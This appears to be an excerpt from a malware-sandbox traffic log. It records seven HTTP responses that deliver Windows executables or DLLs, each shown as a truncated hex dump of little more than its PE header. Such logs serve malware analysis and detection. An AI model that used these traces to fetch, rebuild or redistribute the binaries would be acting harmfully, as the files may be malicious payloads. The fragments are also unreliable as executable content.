                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 12:43:01 GMTContent-Type: application/octet-streamContent-Length: 344992Last-Modified: Tue, 01 Oct 2024 13:44:35 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfcc3-543a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ec 04 00 00 06 00 00 00 00 00 00 ee 0a 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 d7 37 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 0a 05 00 53 00 00 00 00 20 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 1d 05 00 28 26 00 00 00 40 05 00 0c 00 00 00 60 09 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 ea 04 00 00 20 00 00 00 ec 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 20 05 00 00 04 00 00 00 ee 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 05 00 00 02 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 0a 05 00 00 00 00 00 48 00 00 00 02 00 05 00 40 f7 04 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b3 b7 9b 2b 3e 4a 5d 96 cd ba 79 c2 0f 20 39 99 90 3d f3 1a fb 35 0c de 74 1b b6 a3 53 ed f2 34 3b 67 bd 2f 82 6b 1e 54 00 6c 9c 11 3e 47 50 f6 4f 43 95 42 07 24 d6 82 18 8d 21 9b 78 56 05 f5 d4 58 96 2c 9c 37 df 44 fd 71 52 59 da 96 d8 5c f0 38 09 fd 60 4d 1e 63 f6 1b a9 df 36 80 a4 a1 60 ec 98 16 98 44 36 62 79 f2 0e 65 3e 8b 54 79 8e 09 9b ed 22 6c 5a 44 3b bb 0f 14 36 86 ef d7 c6 b0 46 4e 36 54 c1 5e 3a 9e d1 a2 8d 7a eb ad 5f 18 27 89 01 5f 8f 13 d2 7f c4 cc ab 72 3b 80 1c c7 9e 6e 38 d4 0c 0b 55 61 a0 b3 3c de 44 38 cd b7 d3 34 f1 4f 76 5a d7 32 eb 6a 3b 6f 85 39 e4 e0 df a1 3b f7 61 ac 7d b9 79 81 52 d9 ae 89 04 cf d7 00 5c 8b 85 89 89 f0 c6 a2 60 32 93 66 76 ad 4a 02 43 96 2a 44 87 63 75 96 d5 27 dd 5e 2c 62 a3 ec 1c e5 05 1e 46 5e 49 86 02 65 04 d0 48 ae 4e 21 cd b4 8e ce 98 26 be ee 78 e5 12 44 8f ed c9 aa 02 22 82 91 e0 35 e9 06 e7 c4 bb 7a 03 4a a0 b1 73 45 b9 a6 88 d1 ea f6 c0 48 c
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 12:43:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 12:43:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 12:43:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 12:43:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 12:43:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 02 Oct 2024 12:43:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
